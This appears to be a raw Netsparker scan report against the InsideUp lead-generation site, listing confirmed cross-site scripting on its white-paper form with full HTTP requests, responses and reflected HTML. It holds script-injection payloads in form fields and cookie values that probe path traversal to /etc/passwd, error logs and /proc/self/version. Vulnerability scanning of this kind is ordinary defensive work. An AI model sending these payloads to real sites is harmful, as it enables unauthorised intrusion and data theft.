href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="'"--></style></script><script>netsparker(0x0003B8)</script>"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST '"--></style></script><script>alert(0x0003F5)</script>
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 206
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0003F5)%3c%2fscript%3e&firstName=Smith&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=0D21F11002A3C6CBCAE1E116BCC8AE25; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x000439)</script>
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 225
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000439)%3c%2fscript%3e&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4F607FB0A2B29A85F6626116F503E161; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST '"--></style></script><script>alert(0x00045F)</script>
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00045F)%3c%2fscript%3e&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:56 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=5B13041B61AC1A066DBD076214A79EFB; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="'"--></style></script><script>netsparker(0x00045F)</script>"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST '"--></style></script><script>alert(0x000472)</script>
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 225
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000472)%3c%2fscript%3e&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:03 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DAEFBAB4A2D8F10743C2D4C4E69B6524; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
